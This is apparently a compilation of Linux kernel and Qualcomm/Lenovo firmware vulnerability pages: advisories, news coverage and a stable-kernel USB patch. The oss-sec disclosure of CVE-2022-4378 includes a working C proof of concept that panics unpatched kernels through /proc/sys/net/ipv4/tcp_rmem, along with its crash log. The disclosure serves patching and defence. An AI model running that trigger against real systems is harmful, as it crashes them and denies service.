\[  150.235442 \] page:00000000711edc3f refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfnc
\[  150.236154 \] head:00000000711edc3f order:1 compound\_mapcount:0 compound\_pincount:0
\[  150.236724 \] flags: 0x100000000010200(slab|head|node=0|zone=1)
\[  150.237193 \] raw: 0100000000010200 0000000000000000 dead000000000122 ffff888004946dc0
\[  150.237784 \] raw: 0000000000000000 0000000080150015 00000001ffffffff 0000000000000000
\[  150.238367 \] page dumped because: kasan: bad access detected
\[  150.238804 \]
\[  150.238934 \] Memory state around the buggy address:
\[  150.239304 \]  ffff888008bbc380: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
\[  150.239868 \]  ffff888008bbc400: fb fb fb fb fb fb fb fb fc fc fc fc fc fc fc fc
\[  150.240420 \] >ffff888008bbc480: fa fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
\[  150.240967 \]                                   ^
\[  150.241333 \]  ffff888008bbc500: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
\[  150.241885 \]  ffff888008bbc580: fb fb fb fb fb fb fb fb fc fc fc fc fc fc fc fc
\[  150.242431 \] ==================================================================

=\*=\*=\*=\*=\*=\*=\*=\*=  Patch  =\*=\*=\*=\*=\*=\*=\*=\*=

The patch has been done by Dai Ngo, and it can be found here:
https://lore.kernel.org/all/1670885411-10060-1-git-send-email-dai.ngo () oracle com/

=\*=\*=\*=\*=\*=\*=\*=\*=  Credit  =\*=\*=\*=\*=\*=\*=\*=\*=

Xingyuan Mo and Gengjia Chen of IceSword Lab, Qihoo 360 Technology Co. Ltd.


Best Regards,
Xingyuan Mo

**Current thread:**

*   **CVE-2022-4379: Linux kernel: use-after-free in \_\_nfs42\_ssc\_open** _Xingyuan Mo (Dec 14)_

CVE-2022-4379: oss-sec: CVE-2022-4379: Linux kernel: use-after-free in __nfs42_ssc_open

The issue concerns the boot layer of ARM chips, which are driving a low-power mobile ecosystem that includes 5G smartphones and base stations.

A security company is leading the coordinated vulnerability disclosure of multiple high-severity vulnerabilities in the Qualcomm Snapdragon chipset.

The vulnerabilities were identified in the Unified Extensible Firmware Interface (UEFI) firmware reference code and impacts ARM-based laptops and devices using Qualcomm Snapdragon chips, according to Binarly Research.

Qualcomm disclosed the vulnerabilities on Jan. 5, along with links to available patches. Lenovo has also issued a bulletin and a BIOS update to address the flaws in affected laptops. However, two of the vulnerabilities are still not fixed, Binarly noted.

If exploited, these hardware vulnerabilities allow attackers to gain control of the system by modifying a variable in nonvolatile memory, which stores data permanently, even when a system is turned off. The modified variable will compromise the secure boot phase of a system, and an attacker can gain persistent access to compromised systems once the exploit is in place, says Alex Matrosov, founder and CEO of Binarly.

"Basically, the attacker can manipulate variables from the operating system level," Matrosov says.

**Firmware Flaws Open the Door to Attacks**

Secure boot is a system deployed in most PCs and servers to ensure that devices start properly. Adversaries can take control of the system if the boot process is either bypassed or under their control. They can execute malicious code before the operating system is loaded. Firmware vulnerabilities are like leaving a door open — an attacker can gain access to system resources as and when they please when the system is switched on, Matrosov says.

"The firmware piece is important because the attacker can gain very, very interesting persistence capabilities, so they can play for the long term on the device," Matrosov says.

The flaws are notable because they affect processors based on the ARM architecture, which are used in PCs, servers, and mobile devices. A number of security problems have been discovered on x86 chips from Intel and AMD, but Matrosov noted that this disclosure is an early indicator of security flaws existing in ARM chip designs.

Firmware developers need to develop a security-first mindset, Matrosov says. Many PCs today boot based on specifications provided by UEFI Forum, which provides the hooks for the software and hardware to interact.

"We found that OpenSSL, which is used in UEFI firmware — it's in the ARM version — is very outdated," Matrosov says. "As an example, one of the major TPM providers called Infineon, they use an 8-year-old OpenSSL version."

**Addressing Affected Systems**

In its security bulletin, Lenovo said the vulnerability affected the BIOS of the ThinkPad X13s laptop. The BIOS update patches the flaws.

Microsoft's Windows Dev Kit 2023, code-named Project Volterra, is also impacted by the vulnerability, Binarly said in a research note. Project Volterra is designed for programmers to write and test code for the Windows 11 operating system. Microsoft is using the Project Volterra device to lure conventional x86 Windows developers into the ARM software ecosystem, and the device's release was a top announcement at Microsoft's Build and ARM's DevSummit conferences last year.

The Meltdown and Spectre vulnerabilities largely affected x86 chips in server and PC infrastructures. But the discovery of vulnerabilities in ARM's boot layer is particularly concerning because the architecture is driving a low-power mobile ecosystem, which includes 5G smartphones and base stations. The base stations are increasingly at the center of communications for edge devices and cloud infrastructures. Attackers could behave like operators, and they will have persistence at base stations and nobody will know, Matrosov says.

System administrators need to prioritize patching firmware flaws by understanding the risk to their company and addressing it quickly, he says. Binarly offers open source tools to detect firmware vulnerabilities.

"Not every company has policies to deliver firmware fixes to their devices," Matrosov says. "I have worked for large companies in the past, and before I started my own company, none of them — even these hardware-related companies — had an internal policy to update the firmware on employee laptops and devices. This is not right."

Latest Firmware Flaws in Qualcomm Snapdragon Need Attention

A buffer over-read vulnerability was reported in the ThinkPadX13s BIOS LenovoRemoteConfigUpdateDxe driver that could allow a local attacker with elevated privileges to cause information disclosure.

**About Lenovo**

*   Our Company
*   News
*   Investor Relations
*   Sustainability
*   Product Compliance
*   Product Security
*   Lenovo Open Source
*   Legal Information
*   Jobs at Lenovo

**Shop**

*   Laptops & Ultrabooks
*   Tablets
*   Desktops & All-in-Ones
*   Workstations
*   Accessories & Software
*   Servers
*   Storage
*   Networking
*   Laptop Deals
*   Outlet

**Support**

*   Drivers & Software
*   How To's
*   Warranty Lookup
*   Parts Lookup
*   Contact Us
*   Repair Status Check
*   Imaging & Security Resources

**Resources**

*   Where to Buy
*   Shopping Help
*   Sales Order Status
*   Product Specifications (PSREF)
*   Forums
*   Registration
*   Product Accessibility
*   Environmental Information
*   Gaming Community
*   LenovoEDU Community
*   LenovoPRO Community

© Lenovo.  
| | | |

CVE-2022-4435: ThinkPad X13s BIOS Vulnerabilities - Lenovo Support US

A stack overflow flaw was found in the Linux kernel's SYSCTL subsystem in how a user changes certain kernel parameters and variables. This flaw allows a local user to crash or potentially escalate their privileges on the system.

**oss-sec mailing list archives**

_From_: Kyle Zeng <zengyhkyle () gmail com>  
_Date_: Fri, 9 Dec 2022 09:11:25 -0700  

Hi there,

I recently found a stack-based buffer overflow in the Linux kernel,
which can cause DOS and is potentially exploitable. This bug affects
the following kernel versions: latest, 6.0, 5.15, 5.10, 5.4, 4.19,
4.14, and 4.9. I already contacted security () kernel org and helped them
patch the vulnerable kernel versions.

# Vulnerability
The vulnerability is caused by a missing check on user input. More
specifically, \_\_do\_proc\_dointvec function has the following snippet:
~~~
if (write) {
    ......
    if (left > PAGE\_SIZE - 1)
        left = PAGE\_SIZE - 1;
    p = buffer;
}
......
if (write) {
    left -= proc\_skip\_spaces(&p);
~~~
In this snippet, \`buffer\` and \`p\` represent a buffer containing
user-supplied input and it can contain more than 1 page of data. It
first truncates user input to 1 page (by marking number of bytes
\`left\` as 1 page). However, in a later call to \`proc\_skip\_spaces\` (a
function that assumes the argument is a NULL-terminated string), it
forgets the "up to 1 page" limit, processes all user input, and
calculates how many leading spaces are there in the user input. In the
buffer contains more than 1 page of spaces, \`left\` will be set to a
negative value. The negative value will then be passed to
\`proc\_get\_long\` and the least significant 4 bytes will be used as
length for memcpy that copies data to kernel stack, causing
stack-based buffer overflow: (the check on \`len\` won't work because
\`len\` is signed)
~~~
static int proc\_get\_long(...)
{
    char tmp\[TMPBUFLEN\];
    int len = \*size;

    if (len > TMPBUFLEN - 1)
        len = TMPBUFLEN - 1;

    memcpy(tmp, \*buf, len);
    ......
}
~~~

# Patch
The patch consists of two parts:
1.  refactor \`proc\_skip\_spaces\`, instead of assuming the argument is a
NULL-terminated string, it now will process data up to a limit. The
patch can be found here:
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=bce9332220bd677d83b19d21502776ad555a0e73
2. fix the signness issue in \`len\`:
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=e6cfaf34be9fcd1a8285a294e18986bfc41a409c

# Trigger
The bug is triggerable by non-root users if they have access to
user-namespace. A proof-of-concept crash program that causes kernel
panic is attached. To run the POC, you need net namespace. In other
words, you can trigger the bug using the following command: \`unshare
-rn\` and then \`./poc\`.

Best,
Kyle Zeng

===========================================
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/mman.h>

int main(void)
{
    int fd = open("/proc/sys/net/ipv4/tcp\_rmem", O\_WRONLY);
    void \*a = mmap(NULL, 0x2000, PROT\_READ|PROT\_WRITE,
MAP\_ANON|MAP\_PRIVATE, -1, 0);
    memset(a, '\\x09', 0x2000);
    write(fd, a, 0x2000);
    return 0;
}
============================================
\[    7.150435\] BUG: stack guard page was hit at 00000000eea91c87
(stack is 00000000fdd90d6b..000000009d81213d)
\[    7.152330\] kernel stack overflow (page fault): 0000 \[#1\] SMP NOPTI
\[    7.153467\] CPU: 3 PID: 476 Comm: poc Not tainted 5.10.157 #37
\[    7.154815\] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996),
BIOS 1.15.0-1 04/01/2014
\[    7.156633\] RIP: 0010:memcpy\_erms+0x6/0x10
\[    7.157118\] Code: cc cc cc cc eb 1e 0f 1f 00 48 89 f8 48 89 d1 48
c1 e9 03 83 e2 07 f3 48 a5 89 d1 f3 a4 c3 66 0f 1f 44 00 00 48 89 f8
48 89 d1 <f3> a4 c3 0f 1f 80 00 00 00 00 48 89 f8 48 83 fa 20 72 7e 40
38 fe
\[    7.158177\] RSP: 0018:ffffc90000823c68 EFLAGS: 00010282
\[    7.158488\] RAX: ffffc90000823ca0 RBX: ffffffffffffefff RCX: ffffffffffffec9f
\[    7.158932\] RDX: ffffffffffffefff RSI: ffff888007d7e360 RDI: ffffc90000824000
\[    7.159347\] RBP: ffffc90000823d00 R08: ffffffff824158b3 R09: 0000000000000000
\[    7.159802\] R10: ffffc90000823eb8 R11: ffffffff810fb290 R12: ffffc90000823d58
\[    7.160201\] R13: ffffc90000823d47 R14: ffffc90000823ca0 R15: ffffffffffffefff
\[    7.160603\] FS:  0000000001a533c0(0000) GS:ffff88803ed80000(0000)
knlGS:0000000000000000
\[    7.161053\] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
\[    7.161373\] CR2: ffffc90000824000 CR3: 0000000007f3e006 CR4: 0000000000770ee0
\[    7.161769\] PKRU: 55555554
\[    7.161924\] Call Trace:
\[    7.162076\]  proc\_get\_long+0x90/0x190
\[    7.162286\] Modules linked in:
\[    7.162463\] ---\[ end trace d4a913b02029fee9 \]---
\[    7.162722\] RIP: 0010:memcpy\_erms+0x6/0x10
\[    7.162952\] Code: cc cc cc cc eb 1e 0f 1f 00 48 89 f8 48 89 d1 48
c1 e9 03 83 e2 07 f3 48 a5 89 d1 f3 a4 c3 66 0f 1f 44 00 00 48 89 f8
48 89 d1 <f3> a4 c3 0f 1f 80 00 00 00 00 48 89 f8 48 83 fa 20 72 7e 40
38 fe
\[    7.164044\] RSP: 0018:ffffc90000823c68 EFLAGS: 00010282
\[    7.164370\] RAX: ffffc90000823ca0 RBX: ffffffffffffefff RCX: ffffffffffffec9f
\[    7.164780\] RDX: ffffffffffffefff RSI: ffff888007d7e360 RDI: ffffc90000824000
\[    7.165188\] RBP: ffffc90000823d00 R08: ffffffff824158b3 R09: 0000000000000000
\[    7.165595\] R10: ffffc90000823eb8 R11: ffffffff810fb290 R12: ffffc90000823d58
\[    7.166002\] R13: ffffc90000823d47 R14: ffffc90000823ca0 R15: ffffffffffffefff
\[    7.166431\] FS:  0000000001a533c0(0000) GS:ffff88803ed80000(0000)
knlGS:0000000000000000
\[    7.166889\] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
\[    7.167218\] CR2: ffffc90000824000 CR3: 0000000007f3e006 CR4: 0000000000770ee0
\[    7.167661\] PKRU: 55555554
\[    7.167820\] Kernel panic - not syncing: Fatal exception
\[    7.168333\] Kernel Offset: disabled
\[    7.168544\] Rebooting in 1000 seconds..

**Current thread:**

*   **CVE-2022-4378: Linux kernel stack-based buffer overflow** _Kyle Zeng (Dec 09)_

CVE-2022-4378: Linux kernel stack-based buffer overflow

Qualcomm on Tuesday released patches to address multiple security flaws in its chipsets, some of which could be exploited to cause information disclosure and memory corruption.
The five vulnerabilities -- tracked from CVE-2022-40516 through CVE-2022-40520 -- also impact Lenovo ThinkPad X13s laptops, prompting the Chinese PC maker to issue BIOS updates to plug the security holes.
The list of

Qualcomm on Tuesday released patches to address multiple security flaws in its chipsets, some of which could be exploited to cause information disclosure and memory corruption.

The five vulnerabilities -- tracked from CVE-2022-40516 through CVE-2022-40520 -- also impact Lenovo ThinkPad X13s laptops, prompting the Chinese PC maker to issue BIOS updates to plug the security holes.

The list of flaws is as follows -

*   **CVE-2022-40516, CVE-2022-40517 & CVE-2022-40520** (CVSS scores: 8.4) - Memory corruption in Core due to stack-based buffer overflow
*   **CVE-2022-40518 & CVE-2022-40519** (CVSS scores: 6.8) - Information disclosure due to buffer over-read in Core

Stack-based buffer overflow vulnerabilities can result in severe impacts, such as data corruption, system crashes, and arbitrary code execution. Buffer over-reads, on the other hand, can be weaponized to read out-of-bounds memory, leading to the exposure of secret data.

Successful exploitation of the aforementioned flaws could allow a local adversary with elevated privileges to cause memory corruption or leak sensitive information, Lenovo noted in an alert published Tuesday.

Also remediated by Lenovo are four more buffer over-read vulnerabilities in ThinkPad X13 BIOS that could lead to information disclosure. The flaws are tracked as CVE-2022-4432, CVE-2022-4433, CVE-2022-4434, and CVE-2022-4435.

ThinkPad X13 users are recommended to update the BIOS to version 1.47 (N3HET75W) or newer. Firmware security firm Binarly has been credited with discovering and reporting the nine shortcomings.

Qualcomm's January 2023 security bulletin further closes out 17 other vulnerabilities, including one critical memory corruption bug in the Automotive component (CVE-2022-33219, CVSS score: 9.3) arising as a result of a buffer overflow flaw.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Qualcomm Chipsets and Lenovo BIOS Get Security Updates to Fix Multiple Flaws

A flaw incorrect access control in the Linux kernel USB core subsystem was found in the way user attaches usb device. A local user could use this flaw to crash the system.

From: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
To: linux-kernel@vger.kernel.org
Cc: Greg Kroah-Hartman <gregkh@linuxfoundation.org>,
	stable@vger.kernel.org, Alan Stern <stern@rowland.harvard.edu>,
	Rondreis <linhaoguo86@gmail.com>
Subject: \[PATCH 5.4 053/108\] USB: core: Prevent nested device-reset calls
Date: Tue, 13 Sep 2022 16:06:24 +0200	\[thread overview\]
Message-ID: <20220913140355.910732567@linuxfoundation.org> (raw)
In-Reply-To: <20220913140353.549108748@linuxfoundation.org\>

From: Alan Stern <stern@rowland.harvard.edu>

commit 9c6d778800b921bde3bff3cff5003d1650f942d1 upstream.

Automatic kernel fuzzing revealed a recursive locking violation in
usb-storage:

============================================
WARNING: possible recursive locking detected
5.18.0 #3 Not tainted
--------------------------------------------
kworker/1:3/1205 is trying to acquire lock:
ffff888018638db8 (&us\_interface\_key\[i\]){+.+.}-{3:3}, at:
usb\_stor\_pre\_reset+0x35/0x40 drivers/usb/storage/usb.c:230

but task is already holding lock:
ffff888018638db8 (&us\_interface\_key\[i\]){+.+.}-{3:3}, at:
usb\_stor\_pre\_reset+0x35/0x40 drivers/usb/storage/usb.c:230

...

stack backtrace:
CPU: 1 PID: 1205 Comm: kworker/1:3 Not tainted 5.18.0 #3
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS
1.13.0-1ubuntu1.1 04/01/2014
Workqueue: usb\_hub\_wq hub\_event
Call Trace:
<TASK>
\_\_dump\_stack lib/dump\_stack.c:88 \[inline\]
dump\_stack\_lvl+0xcd/0x134 lib/dump\_stack.c:106
print\_deadlock\_bug kernel/locking/lockdep.c:2988 \[inline\]
check\_deadlock kernel/locking/lockdep.c:3031 \[inline\]
validate\_chain kernel/locking/lockdep.c:3816 \[inline\]
\_\_lock\_acquire.cold+0x152/0x3ca kernel/locking/lockdep.c:5053
lock\_acquire kernel/locking/lockdep.c:5665 \[inline\]
lock\_acquire+0x1ab/0x520 kernel/locking/lockdep.c:5630
\_\_mutex\_lock\_common kernel/locking/mutex.c:603 \[inline\]
\_\_mutex\_lock+0x14f/0x1610 kernel/locking/mutex.c:747
usb\_stor\_pre\_reset+0x35/0x40 drivers/usb/storage/usb.c:230
usb\_reset\_device+0x37d/0x9a0 drivers/usb/core/hub.c:6109
r871xu\_dev\_remove+0x21a/0x270 drivers/staging/rtl8712/usb\_intf.c:622
usb\_unbind\_interface+0x1bd/0x890 drivers/usb/core/driver.c:458
device\_remove drivers/base/dd.c:545 \[inline\]
device\_remove+0x11f/0x170 drivers/base/dd.c:537
\_\_device\_release\_driver drivers/base/dd.c:1222 \[inline\]
device\_release\_driver\_internal+0x1a7/0x2f0 drivers/base/dd.c:1248
usb\_driver\_release\_interface+0x102/0x180 drivers/usb/core/driver.c:627
usb\_forced\_unbind\_intf+0x4d/0xa0 drivers/usb/core/driver.c:1118
usb\_reset\_device+0x39b/0x9a0 drivers/usb/core/hub.c:6114

This turned out not to be an error in usb-storage but rather a nested
device reset attempt.  That is, as the rtl8712 driver was being
unbound from a composite device in preparation for an unrelated USB
reset (that driver does not have pre\_reset or post\_reset callbacks),
its ->remove routine called usb\_reset\_device() -- thus nesting one
reset call within another.

Performing a reset as part of disconnect processing is a questionable
practice at best.  However, the bug report points out that the USB
core does not have any protection against nested resets.  Adding a
reset\_in\_progress flag and testing it will prevent such errors in the
future.

Link: https://lore.kernel.org/all/CAB7eexKUpvX-JNiLzhXBDWgfg2T9e9\_0Tw4HQ6keN==voRbP0g@mail.gmail.com/
Cc: stable@vger.kernel.org
Reported-and-tested-by: Rondreis <linhaoguo86@gmail.com>
Signed-off-by: Alan Stern <stern@rowland.harvard.edu>
Link: https://lore.kernel.org/r/YwkflDxvg0KWqyZK@rowland.harvard.edu
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
---
 drivers/usb/core/hub.c |   10 ++++++++++
 include/linux/usb.h    |    2 ++
 2 files changed, 12 insertions(+)

--- a/drivers/usb/core/hub.c
+++ b/drivers/usb/core/hub.c
@@ -5923,6 +5923,11 @@ re\_enumerate\_no\_bos:
  \* the reset is over (using their post\_reset method).
  \*
  \* Return: The same as for usb\_reset\_and\_verify\_device().
+ \* However, if a reset is already in progress (for instance, if a
+ \* driver doesn't have pre\_ or post\_reset() callbacks, and while
+ \* being unbound or re-bound during the ongoing reset its disconnect()
+ \* or probe() routine tries to perform a second, nested reset), the
+ \* routine returns -EINPROGRESS.
  \*
  \* Note:
  \* The caller must own the device lock.  For example, it's safe to use
@@ -5956,6 +5961,10 @@ int usb\_reset\_device(struct usb\_device \*
 		return -EISDIR;
 	}
 
+	if (udev->reset\_in\_progress)
+		return -EINPROGRESS;
+	udev->reset\_in\_progress = 1;
+
 	port\_dev = hub->ports\[udev->portnum - 1\];
 
 	/\*
@@ -6020,6 +6029,7 @@ int usb\_reset\_device(struct usb\_device \*
 
 	usb\_autosuspend\_device(udev);
 	memalloc\_noio\_restore(noio\_flag);
+	udev->reset\_in\_progress = 0;
 	return ret;
 }
 EXPORT\_SYMBOL\_GPL(usb\_reset\_device);
--- a/include/linux/usb.h
+++ b/include/linux/usb.h
@@ -580,6 +580,7 @@ struct usb3\_lpm\_parameters {
  \* @devaddr: device address, XHCI: assigned by HW, others: same as devnum
  \* @can\_submit: URBs may be submitted
  \* @persist\_enabled:  USB\_PERSIST enabled for this device
+ \* @reset\_in\_progress: the device is being reset
  \* @have\_langid: whether string\_langid is valid
  \* @authorized: policy has said we can use it;
  \*	(user space) policy determines if we authorize this device to be
@@ -665,6 +666,7 @@ struct usb\_device {
 
 	unsigned can\_submit:1;
 	unsigned persist\_enabled:1;
+	unsigned reset\_in\_progress:1;
 	unsigned have\_langid:1;
 	unsigned authorized:1;
 	unsigned authenticated:1;

next prev parent reply	other threads:\[~2022-09-13 15:01 UTC|newest\]

**Thread overview:** 114+ messages / expand\[flat|nested\]  mbox.gz  Atom feed  top
2022-09-13 14:05 \[PATCH 5.4 000/108\] 5.4.212-rc1 review Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 001/108\] efi: capsule-loader: Fix use-after-free in efi\_capsule\_write Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 002/108\] wifi: iwlegacy: 4965: corrected fix for potential off-by-one overflow in il4965\_rs\_fill\_link\_cmd() Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 003/108\] net: mvpp2: debugfs: fix memory leak when using debugfs\_lookup() Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 004/108\] fs: only do a memory barrier for the first set\_buffer\_uptodate() Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 005/108\] Revert "mm: kmemleak: take a full lowmem check in kmemleak\_\*\_phys()" Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 006/108\] net: dp83822: disable false carrier interrupt Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 007/108\] drm/msm/dsi: fix the inconsistent indenting Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 008/108\] drm/msm/dsi: Fix number of regulators for msm8996\_dsi\_cfg Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 009/108\] platform/x86: pmc\_atom: Fix SLP\_TYPx bitfield mask Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 010/108\] iio: adc: mcp3911: make use of the sign bit Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 011/108\] ieee802154/adf7242: defer destroy\_workqueue call Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 012/108\] wifi: cfg80211: debugfs: fix return type in ht40allow\_map\_read() Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 013/108\] Revert "xhci: turn off port power in shutdown" Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 014/108\] net: sched: tbf: dont call qdisc\_put() while holding tree lock Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 015/108\] ethernet: rocker: fix sleep in atomic context bug in neigh\_timer\_handler Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 016/108\] kcm: fix strp\_init() order and cleanup Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 017/108\] sch\_cake: Return \_\_NET\_XMIT\_STOLEN when consuming enqueued skb Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 018/108\] tcp: annotate data-race around challenge\_timestamp Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 019/108\] Revert "sch\_cake: Return \_\_NET\_XMIT\_STOLEN when consuming enqueued skb" Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 020/108\] net/smc: Remove redundant refcount increase Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 021/108\] serial: fsl\_lpuart: RS485 RTS polariy is inverse Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 022/108\] staging: rtl8712: fix use after free bugs Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 023/108\] powerpc: align syscall table for ppc32 Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 024/108\] vt: Clear selection before changing the font Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 025/108\] tty: serial: lpuart: disable flow control while waiting for the transmit engine to complete Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 026/108\] Input: iforce - wake up after clearing IFORCE\_XMIT\_RUNNING flag Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 027/108\] iio: adc: mcp3911: use correct formula for AD conversion Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 028/108\] misc: fastrpc: fix memory corruption on probe Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 029/108\] misc: fastrpc: fix memory corruption on open Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 030/108\] USB: serial: ftdi\_sio: add Omron CS1W-CIF31 device id Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 031/108\] binder: fix UAF of ref->proc caused by race condition Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 032/108\] usb: dwc3: qcom: fix use-after-free on runtime-PM wakeup Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 033/108\] drm/i915/reg: Fix spelling mistake "Unsupport" -> "Unsupported" Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 034/108\] clk: core: Honor CLK\_OPS\_PARENT\_ENABLE for clk gate ops Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 035/108\] Revert "clk: core: Honor CLK\_OPS\_PARENT\_ENABLE for clk gate ops" Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 036/108\] clk: core: Fix runtime PM sequence in clk\_core\_unprepare() Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 037/108\] Input: rk805-pwrkey - fix module autoloading Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 038/108\] clk: bcm: rpi: Fix error handling of raspberrypi\_fw\_get\_rate Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 039/108\] hwmon: (gpio-fan) Fix array out of bounds access Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 040/108\] gpio: pca953x: Add mutex\_lock for regcache sync in PM Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 041/108\] thunderbolt: Use the actual buffer in tb\_async\_error() Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 042/108\] xhci: Add grace period after xHC start to prevent premature runtime suspend Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 043/108\] USB: serial: cp210x: add Decagon UCA device id Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 044/108\] USB: serial: option: add support for OPPO R11 diag port Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 045/108\] USB: serial: option: add Quectel EM060K modem Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 046/108\] USB: serial: option: add support for Cinterion MV32-WA/WB RmNet mode Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 047/108\] usb: typec: altmodes/displayport: correct pin assignment for UFP receptacles Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 048/108\] usb: dwc2: fix wrong order of phy\_power\_on and phy\_init Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 049/108\] USB: cdc-acm: Add Icom PMR F3400 support (0c26:0020) Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 050/108\] usb-storage: Add ignore-residue quirk for NXP PN7462AU Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 051/108\] s390/hugetlb: fix prepare\_hugepage\_range() check for 2 GB hugepages Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 052/108\] s390: fix nospec table alignments Greg Kroah-Hartman
**2022-09-13 14:06 \` Greg Kroah-Hartman \[this message\]**
2022-09-13 14:06 \` \[PATCH 5.4 054/108\] usb: gadget: mass\_storage: Fix cdrom data transfers on MAC-OS Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 055/108\] driver core: Dont probe devices after bus\_type.match() probe deferral Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 056/108\] wifi: mac80211: Dont finalize CSA in IBSS mode if state is disconnected Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 057/108\] ip: fix triggering of icmp redirect Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 058/108\] net: mac802154: Fix a condition in the receive path Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 059/108\] ALSA: seq: oss: Fix data-race for max\_midi\_devs access Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 060/108\] ALSA: seq: Fix data-race at module auto-loading Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 061/108\] drm/i915/glk: ECS Liva Q2 needs GLK HDMI port timing quirk Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 062/108\] btrfs: harden identification of a stale device Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 063/108\] usb: dwc3: fix PHY disable sequence Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 064/108\] usb: dwc3: disable USB core PHY management Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 065/108\] USB: serial: ch341: fix lost character on LCR updates Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 066/108\] USB: serial: ch341: fix disabled rx timer on older devices Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 067/108\] scsi: megaraid\_sas: Fix double kfree() Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 068/108\] drm/gem: Fix GEM handle release errors Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 069/108\] drm/amdgpu: Check num\_gfx\_rings for gfx v9\_0 rb setup Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 070/108\] drm/radeon: add a force flush to delay work when radeon Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 071/108\] parisc: ccio-dma: Handle kmalloc failure in ccio\_init\_resources() Greg Kroah-Hartman
